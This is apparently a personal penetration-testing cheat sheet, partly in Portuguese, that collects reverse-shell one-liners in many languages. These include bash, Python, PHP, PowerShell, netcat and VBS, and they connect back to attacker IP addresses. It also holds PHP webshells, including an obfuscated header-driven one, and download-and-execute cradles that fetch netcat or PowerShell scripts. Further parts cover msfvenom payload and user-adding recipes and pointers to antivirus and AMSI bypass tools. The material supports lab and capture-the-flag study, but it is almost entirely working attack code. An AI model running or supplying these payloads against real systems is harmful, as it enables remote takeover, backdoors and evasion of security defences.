Skip to content

Shell reversa

References https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

/bin/bash -l > /dev/tcp/10.10.14.96/8081 0<&1 2>&1

/bin/bash -l > /dev/tcp/10.10.14.17/8081 0<&1 2>&1

/usr/bin/bash -l > /dev/tcp/10.10.14.17/8081 0<&1 2>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python 3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.109",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"10.10.14.21"/443 0>&1'");?>
http://10.10.14.21/shell.php
http://10.10.14.21/webshell.php
http://10.10.14.21/webshell.php?cmd=whoami
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

Webshell

<?php system($_REQUEST['cmd']); ?>

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.0.0.1 1234
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
/bin/sh | nc 10.0.0.1 80
rm -f /tmp/p; mknod /tmp/p p && nc 10.0.0.1 4444 0/tmp/p

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f

OpenBSD Netcat

mkfifo /tmp/lol;nc 10.10.14.17 8081 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 8081 >/tmp/f

socat

Gerando certificado para fechar conexões criptografadas

req: initiate a new certificate signing request -newkey: generate a new private key rsa:2048: use RSA encryption with a 2,048-bit key length. -nodes: store the private key without passphrase protection -keyout: save the key to a file -x509: output a self-signed certificate instead of a certificate request -days: set validity period in days -out: save the certificate to a file

1) listener

openssl req -newkey rsa:2048 -nodes -keyout cert.key -x509 -days 362 -out cert.crt
cat cert.key cert.crt > cert.pem

socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0,fork EXEC:/bin/bash

2) client

socat - OPENSSL:192.168.1.26:443,verify=0

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

powershell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.17",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# ESCAPED
$client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.17\",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.14.17",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -ExecutionPolicy Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.17/powercat.ps1');powercat -c 10.10.14.17 -p 8081 -e powershell"

powershell -ExecutionPolicy Bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.134/invoke-powershell-tcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.134 -Port 443

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

telnet

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

CMD

Aqui vale uns comentários. Vale ressalltar que todos eles dependem de um terceiro para funcionar. Seja o netcat ou seja o powershell com duas variações interessantes.

Como o CMD em si não proporciona nenhuma ferramenta para obtermos shell reversa, temos algumas opções interessantes aqui disponíveis... são elas:

C:\Windows\System32\cmd.exe /c "mkdir c:\temp & copy \\10.10.14.11\smb\nc64.exe c:\temp\w.exe & c:\temp\w.exe -e C:\Windows\System32\cmd.exe 10.10.14.11 8082"

Nesse caso temos a opção de subir um netcat na máquina alvo e executá-lo conforme comando acima. Outra opção seria utilizar o powershell para abertura dessa shell

C:\Windows\System32\cmd.exe /c "powershell -ExecutionPolicy Bypass -Command [scriptblock]::Create((Invoke-WebRequest "http://192.168.0.165/shell2.txt").Content).Invoke();"

C:\Windows\System32\cmd.exe /c "powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.0.165/powercat.ps1');powercat -c 192.168.0.165 -p 8083 -e powershell"

msfvenom

List of payloads

msfvenom -l payloads

Listener for MSfvenom Payloads:

msf5>use exploit/multi/handler  
msf5>set payload windows/meterpreter/reverse_tcp  
msf5>set lhost   
msf5>set lport   
msf5> set ExitOnSession false  
msf5>exploit -j

Payload options

msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe    
msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe    
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe    
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe    
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

VBS

Set oT = CreateObject("Wscript.Shell")
oT.Run "cmd.exe /c mkdir c:\temp"
oT.Run "cmd.exe /c curl 10.8.1.121/nc64.exe -o c:\temp\n.exe"
oT.Run "cmd.exe /c c:\temp\n.exe -e cmd 10.8.1.121 8081"

linux

msfvenom -p linux/x86/shell_reverse_tcp -f elf LHOST=192.168.119.181 LPORT=80 > rshell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf    
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf    
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf    
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

java

WAR PAYLOAD

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.150 LPORT=80 -f war -o rshell.war

JSP PAYLOAD

msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=192.168.119.143 LPORT=5555 > shell.jsp

Creating a payload with encoding

msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile

Creating a payload using a template

msfvenom -p [payload] -x [template] -f [formattype] > outputfile

Linux Payloads

Add a user in windows with msfvenom:

msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Creating an Msfvenom Payload with an encoder while removing bad charecters:

msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"

https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/

Bypass AV

# Veil Framework:
https://github.com/Veil-Framework/Veil

# Shellter
https://www.shellterproject.com/download/

# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless: 
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

# Stageless HTA Payload: 
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

# Donut: 
https://github.com/TheWover/donut

# Vulcan
https://github.com/praetorian-code/vulcan

Bypass Amsi

# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass

# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html

Office Docs

https://github.com/thelinuxchoice/eviloffice
https://github.com/thelinuxchoice/evilpdf